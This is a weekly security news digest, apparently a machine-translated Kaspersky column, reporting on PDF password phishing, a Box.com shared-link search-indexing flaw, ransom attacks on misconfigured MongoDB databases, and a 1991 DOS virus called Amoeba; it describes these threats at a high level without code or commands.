Security Week 01-02: vulnerability in box.com, password phishing in PDF, attacks on MongoDB

While the editors of the weekly security digests were in post-New Year prostration, the flow of politics spread over the threat landscape. There were a lot of cybersecurity in the news headlines and statements of politicians, but we will not succumb to provocations: there was nothing that influenced the real protection of anyone. The investigation into the hacking of the National Committee of the Democratic Party of the USA will certainly somehow affect the sphere of information security, but is not at all sure of that in a positive way. So we will continue to follow even less loud events, but a little more endowed with interesting facts.

Let's start with an interesting phishing trick using PDF, which was reported by SANS Institute. When you open a document in this format, the user is informed that he is “blocked” and is asked to enter a login and password. The password is then sent to the attacker's server. There are two interesting moments here. First, it is blind phishing: the user can enter the password from the account or from the mail, or it is not clear why. It does not bother intruders: the expectation is that the password is the same everywhere.

Secondly, when you try to send data to the server, Adobe Reader displays a warning. And here, for example, the viewer built into the Microsoft Edge browser sends the entered information silently, without a declaration of war. A similar method (a message about allegedly blocked content) is used in MS Word attachments, but there it is done to force the user to execute malicious code.


')
Box.com closes a vulnerability that allowed you to google confidential documents
News

A curious vulnerability was discovered by researcher Markus Neuss of Swisscom. Using the rather trivial settings of the search engine, he found a way to “google” confidential documents belonging to users of corporate accounts of the Box.com service. A “leak” occurred when a user wanted to share information with someone, for which he created a special link. In this case, it is assumed that access to the content should be only if there is a link, but it turned out that the shared folders are indexed by a search engine.

The problem is so trivial that it is difficult to call it a vulnerability, but there have been many such cases. Box.com even claimed that the links hit the search results because they were posted on public resources. But then I decided to close the indexing of conditionally public content by search engines.

Owners of incorrectly configured databases on MongoDB extort money
News

And one more news about the wrong configuration. At the end of last year, Victor Gevers of the GDI Foundation discovered several instances of attacks on incorrectly configured MongoDB databases. Wrong - in the sense of being accessible from the network with wide rights. The attack took place as follows: the server deleted all the contents of the database and left a note demanding a ransom of 0.2 bitcoin (a little more than $ 200). Over the past two weeks, the number of attacks has increased many times. As of January 9, researchers counted more than 28 thousand attacked servers.



How exactly hacked servers are monitored is not reported, but apparently the same tools are used as for hacking: searching through the specialized search engine Shodan and scanning the found servers. It is reported that after the topic was publicized, an orgy occurred on the attacked servers: since they remain open after hacking, they are sometimes attacked several times, by different groups. The ransom message may change several times for another. The MongoDB developers responded with detailed instructions on how to properly configure the database.

What else remains to do?

Antiquities

"Amoeba-2367"

A very dangerous resident ghost virus. It typically infects .COM and .EXE files that are executed or opened. March 21 and November 1 destroys information on the hard drive. Intercepts int21h. Contains texts:

"Tosee aworld in a grain of sand,
And a heaven in a wildflower
Hold your hand
And Eternity in an hour. ";

"THE VIRUS 16/3/91 AMOEBA virus for the Hacker Twins © 1991 wait our our s s s» »» »!"

Quote from the book "Computer viruses in MS-DOS" Eugene Kaspersky. 1992 Page 59.

Disclaimer: This column reflects only the personal opinion of its author. It may coincide with the position of Kaspersky Lab, or it may not coincide. Then how lucky.